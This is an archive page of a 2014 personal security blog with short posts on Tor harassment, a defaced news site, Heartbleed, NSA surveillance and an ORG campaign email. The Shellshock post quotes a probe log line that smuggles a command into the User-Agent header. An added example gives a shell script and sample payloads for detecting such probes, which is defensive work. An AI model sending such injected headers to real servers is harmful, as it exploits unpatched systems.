Dec 13 2014

solidarity with the tor project

On Thursday 11 December, Roger Dingledine of the Tor project posted the following email to the “tor-talk” mail list (to which I am subscribed).

I’d like to draw your attention to

https://blog.torproject.org/blog/solidarity-against-online-harassment
https://twitter.com/torproject/status/543154161236586496

One of our colleagues has been the target of a sustained campaign of harassment for the past several months. We have decided to publish this statement to publicly declare our support for her, for every member of our organization, and for every member of our community who experiences this harassment. She is not alone and her experience has catalyzed us to action. This statement is a start.

Roger asked those who deplored on-line harassment (of any person, for any reason) and who supported the Tor project’s action in publicly condemning the harassment of one of the Tor developers to add their name and voice to the blog post.

I am proud to have done so.

Permanent link to this article: http://baldric.net/2014/12/13/solidarity-with-the-tor-project/

Nov 27 2014

independent hit

On trying to reach the website of the Independent newspaper today (the Grauniad is trying my patience of late), I received the following response:

[Screenshot: www.independent.co.uk as displayed in Chromium]

Closing the popup takes you to this page:

[Screenshot: "Hacked by SEA" page as displayed in Chromium]

I haven’t checked whether this is simply a DNS redirect or an actual compromise of the Indy site, but however the graffiti was added, it indicates that the Indy has a problem.

Permanent link to this article: http://baldric.net/2014/11/27/independent-hit/

Sep 26 2014

CVE-2014-6271 bash vulnerability

Guess what I found in trivia’s logs this morning?

89.207.135.125 - - [25/Sep/2014:10:48:13 +0100] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 345 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"

I’ll bet a lot of cgi scripts are being poked at the moment.

Check your logs, guys. A simple grep ":;}" access.log will tell you all you need to know.
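As an added example (not part of the original post), here is a small shell script that generalises that grep one-liner: it scans a constructed sample access log for the "() {" function-definition prefix in any header field (a variant such as "() { _; }" would slip past ":;}") and prints one triage line per hit. The sample IPs are from the TEST-NET documentation ranges, not real probes.

```shell
#!/bin/sh
# Added example: scan a combined-format web access log for Shellshock
# (CVE-2014-6271) probes and summarise each hit for triage.

# Constructed sample log (TEST-NET addresses; not real traffic).
SAMPLE_LOG='192.0.2.10 - - [25/Sep/2014:10:48:13 +0100] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 345 "-" "() { :;}; /bin/ping -c 1 192.0.2.99"
198.51.100.7 - - [25/Sep/2014:11:02:41 +0100] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.5 - - [25/Sep/2014:11:15:09 +0100] "GET /cgi-bin/test.cgi HTTP/1.0" 404 345 "() { _; }; echo probe" "curl/7.30"'

# Shellshock payloads start with "()" followed by optional spaces and "{".
# This catches probes placed in the User-Agent, Referer or any other field.
SHOCK_RE='\(\) *[{]'

# Echo the number of log lines carrying a Shellshock-style prefix.
shellshock_count() {
    grep -c -E "$SHOCK_RE" "$1"
}

# Print "client-ip<TAB>request<TAB>payload" for each matching line, where the
# payload is the text from "() {" up to the closing quote of that header field.
shellshock_report() {
    grep -E "$SHOCK_RE" "$1" | awk '
    {
        ip = $1
        # The request line is the first double-quoted field in combined format.
        split($0, q, "\"")
        request = q[2]
        match($0, /\(\) *[{][^"]*/)
        payload = substr($0, RSTART, RLENGTH)
        printf "%s\t%s\t%s\n", ip, request, payload
    }'
}

# Stand-alone run: write the sample to a temporary file and scan it.
LOGFILE="${TMPDIR:-/tmp}/shellshock_sample.$$"
printf '%s\n' "$SAMPLE_LOG" > "$LOGFILE"
echo "probes found: $(shellshock_count "$LOGFILE")"
shellshock_report "$LOGFILE"
rm -f "$LOGFILE"
```

Point it at a real access.log with shellshock_report /var/log/apache2/access.log to get the same per-hit summary.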

(Update 27 September)

Digital Ocean, the company I use to host my Tor node and tails/whonix mirrors, has posted a useful note about the vulnerability. And John Leyden at El Reg posted about the problem here. Leyden’s article references some of the more authoritative discussions so I won’t repeat the links here.

All my systems were vulnerable, but of course have now been patched. However, the vulnerability has existed in bash for so long that I can’t help but feel deeply uneasy even though, as Michal Zalewski (aka lcamtuf) notes in his blog:

PS. As for the inevitable “why hasn’t this been noticed for 15 years” / “I bet the NSA knew about it” stuff – my take is that it’s a very unusual bug in a very obscure feature of a program that researchers don’t really look at, precisely because no reasonable person would expect it to fail this way. So, life goes on.

Permanent link to this article: http://baldric.net/2014/09/26/cve-2014-6271-bash-vulnerability/

Aug 13 2014

net neutrality

My apologies that this is a few weeks late – but it still bears posting. John Oliver at HBO gave the best description of the net neutrality argument I have seen so far.

Following that broadcast, the FCC servers were, rather predictably, overwhelmed by the outraged response from the trolls that Oliver set loose.

Unfortunately, as John Naughton reports in the Observer, the FCC are unlikely to be moved by that.

Permanent link to this article: http://baldric.net/2014/08/13/net-neutrality/

Aug 11 2014

levison on dime

Ladar Levison and Stephen Wyatt presented the upcoming Dark Internet Mail Environment (DIME) at Defcon22 this week. According to El Reg, Levison, who shut down Lavabit, his previous mail service, rather than comply with FBI demands that he divulge the private SSL certificates used to encrypt traffic on that service, said:

“I’m not upset that I got railroaded and I had to shut down my business … I’m upset because we need a mil-spec cryptographic mail system for the entire planet just to be able to talk to our friends and family without any kind of fear of government surveillance”.

I think that puts the problem into perspective.

Permanent link to this article: http://baldric.net/2014/08/11/levison-on-dime/

Jul 28 2014

punctuation matters

There is a nice tweet over at @NSA_PR. It reads:

We take your privacy, seriously.

Beyond parody.

Permanent link to this article: http://baldric.net/2014/07/28/punctuation-matters/

Jul 23 2014

department of dirty

Like most ‘net users I get my fair share of spam. Most of it gets binned automatically by my email system, but of course some still gets through so I am used to hitting the delete button on random email from .ru domains offering me the opportunity to “impress my girl tonight”.

Most such phishing email relies on the recipient being dumb enough, naive enough, or (possibly) drunk enough to actually click through the link to the malicious website. I was therefore more than a little astonished at an email I received today from the open rights group. That email is given below in its entirety (I have obfuscated my email address for obvious reasons).

From: Department of Dirty
To: xxxxxxxx@yyy.zzz
Subject: Cleaning up the Internet
Date: Wed, 23 Jul 2014 07:14:18 -0400 (EDT)

Dear Mick,

Ever thought the internet was just too big? Want to help clean up online filth?

*Welcome to the Department of Dirty*

Watch the Department tackling its work here: www.departmentofdirty.co.uk and share our success, as we stop one man try to get one over us with his ‘spotted dick recipe’:

Department of Dirty Video: http://www.departmentofdirty.co.uk/

The Department of Dirty is working with internet and mobile companies to stop the dirty internet. We are committed to protecting children and adults from online filth such as:

*Talk to Frank: This government website tries to educate young people about drugs. We all know what ‘education’ means, don’t we? Blocked by Three.
*Girl Guides Essex:
They say, ‘guiding is about acquiring skills for life’. We say, why would young girls need skills? Blocked by BT.
*South London Refugee Association:
This charity aims to relieve poverty and distress. Not on our watch they don’t. Blocked by BT, EE, Sky and VirginMedia

This is just the tip of the iceberg.

We need you to help us take a stand against blogs, charities and education websites, all of which are being blocked [1]. It’s time to stop this sick filth. Together, we can clean up the internet.

http://www.departmentofdirty.co.uk

Sincerely,

Your Department of Dirty representative

[1] You can find out what we’re blocking at this convenient website: https://www.blocked.org.uk/

[DISCLAIMER] This email has come from the Open Rights Group. This email was delivered to: xxxxxxxx@yyy.zzz If you wish to opt out of future emails, you can do so here.

Now, I’m an ORG supporter (i.e. I am a paying member) and I am sure that someone, somewhere in ORG thought that this email campaign was a great idea. After all, it follows up the ORG’s earlier research on the fairly obvious stupidities arising from the implementation of Dave’s anti-porn campaign, it looks “ironic”, and it uses a snappy domain name which has shades of Monty Python about it. But I’m sorry, in my view this most certainly is not a good idea and I’m sure that ORG will come to regret it.

One of the most fundamental pieces of advice any and every ‘net user is beaten up with is “do not click on links in unsolicited emails”. In particular, the advice normally goes on – “if that email is from an unknown source, or has in any way a suspicious from address, you should immediately bin it”.

This email comes from an unknown address with a wonderfully prurient domain name. Even if it is successful and gets to the intended email inbox [1], it then relies on the recipient breaking a fundamental security rule. It does this by encouraging him (this looks to be male targeted) to click on a link which the naive might believe leads to a porn video.

How exactly is that going to help?

([1] Note. It got to my email inbox because the email system at e-activist.com which sent it is allowed by my filters.)

Permanent link to this article: http://baldric.net/2014/07/23/department-of-dirty/

Jul 21 2014

drip

I get my domestic ADSL connectivity from the rather excellent people at Andrews and Arnold.

Here’s why. And this is the original reason I moved to them.

They also happily take (and similarly reply to) GPG encrypted support questions.

Good guys. Thoroughly recommended.

Now can you /really/ see BT doing any of that?

‘thought not.

Permanent link to this article: http://baldric.net/2014/07/21/drip/

Jun 30 2014

inappropriate use of technology

I have been travelling a lot over the last few months (Czech Republic, Scotland, France, Germany, Austria, Slovenia, Croatia, Italy). That travel, plus my catching up on a load of reading is my excuse for the woeful lack of posts to trivia of late. But hey, sometimes life gets in the way of blogging – which is as it should be.

A couple of things struck me whilst I have been away though. Firstly, and most bizarrely, I noticed a significant number of tourists in popular, and hugely photogenic, locations (such as Prague and Dubrovnik) wandering around staring at their smartphones rather than looking at the reality around them. At first I thought that they were just checking photographs they had taken, or possibly that they were texting or emailing friends and relatives about their holidays, or worse, posting to facebook, but that did not appear to be the case. Then by chance I overheard one tourist telling his partner that they needed to “turn left ahead” whilst they walked past me, so it struck me that they might just possibly be using google maps to navigate. So I watched others more carefully. And I must conclude that many people were doing just that. I can’t help but feel a little saddened that someone should choose to stare at a google app on a small screen in their hand rather than look at the beauty of something like the Charles Bridge across the Vltava.

The second point which struck me was how much of a muppet you look if you use an iPad to take photographs.

Permanent link to this article: http://baldric.net/2014/06/30/inappropriate-use-of-technology/

May 30 2014

a new app

My newspaper of choice, the Guardian, has for some time produced its own android (and iOS of course) app. I have often used the android app on my tablet to catch up on emerging news items at the end of the day. I also read the BBC news app for the same reason. Yesterday I received an update to the Guardian app. That update was a complete rewrite and gives the user a very different experience to the original app. For example, in the old app I could tailor the home screen to show me just the news categories I wanted (i.e. no sport, no fashion, but plenty of politics, business and UK news). In the new app I can only do that if I subscribe to a paid version. Sorry, but no, I already pay for the newspaper, I just want this to give me updated headlines, I don’t want to have to buy the newspaper all over again.

In today’s paper (and on-line of course) there is an editorial comment on the new app explaining its background. The writer opens:

Today I am proud to announce the launch of our redesigned Guardian app. It’s been a ground-up reworking to bring you a new, advanced and beautiful Guardian app. For the first time you will have a seamless experience across phones and tablets, with a cleaner, responsive design that showcases the Guardian’s award-winning journalism to our readers around the world.

The article goes on to explain the history of the original app and the thinking behind the redesign. It continues:

We’re also thrilled to announce that GuardianWitness – the Guardian’s award-winning platform through which readers can contribute their own pictures, videos and text – is now integrated into the app, meaning readers can now contribute to assignments seamlessly and directly within the main app.

Hmmmm.

It continues:

Other new features include:

  • A new flexible layout so we can display different stories in different ways, and show readers which stories are the most important in one glance
  • Breaking news and sport alerts and up-to-the-minute live coverage
  • Increased personalisation: readers can personalise their home screen depending on what topics they’re most interested in, and create notifications to follow favourite writers, stories, series and football teams
  • Improved photo galleries and inclusion of interactives for the first time
  • Off-line reading – with intelligent caching readers will now be able to save articles to read later and have more content at their fingertips wherever they are
  • Open journalism has been built into the app, with even easier ways for readers to contribute comments, videos, photos via our new GuardianWitness integration, as well as a better commenting experience
  • New opportunities for advertisers.

I particularly like that last bit.

And of course the app needs access to my location.

Right.

(P.S. The app called “UK Newspapers” by Markus Reitberger gives access to all the UK news sites you could want – and all it asks for is network access.)

Permanent link to this article: http://baldric.net/2014/05/30/a-new-app/

Apr 16 2014

nsa operation orchestra

In February of this year, Poul-Henning Kamp (a.k.a “PHK”) gave what now looks to be a peculiarly prescient presentation as the closing keynote to 2014’s FOSDEM.

In the presentation (PDF), PHK posits an NSA operation called ORCHESTRA which is designed to undermine internet security through a series of “disinformation” or “misinformation”, or “misdirection” sub operations. ORCHESTRA is intended to be cheap, non-technical, completely deniable, but effective. One of the opening slides gives ORCHESTRA’s “operation at a glance” overview as:

* Objective:
- Reduce cost of COMINT collection
* Scope:
- All above board
- No special authorizations
* Means:
- Eliminate/reduce/prevent encryption
- Enable access
- Frustrate players

PHK delivers the presentation as if he were a mid-ranking NSA staffer intending to brief NATO in Brussels. But “being American, he ends up [at FOSDEM] instead”. The truly scary part of this presentation is that it could all be completely true.

What makes the presentation so timely is his commentary on openssl. Watch it and weep.

Permanent link to this article: http://baldric.net/2014/04/16/nsa-operation-orchestra/

Apr 16 2014

more heartbleed

For any readers uncertain of exactly how the heartbleed vulnerability in openssl might be exploitable, Sean Cassidy over at existential type has a good explanation.

And if you find that difficult to follow, Randall Munroe over at xkcd covers it quite nicely.

[xkcd comic: heartbleed explanation]

My thanks, and appreciation as always, to a great artist.

Of course, Randall foresaw this problem back in 2008 when he published his take on the debian openssl fiasco.

Permanent link to this article: http://baldric.net/2014/04/16/more-heartbleed/
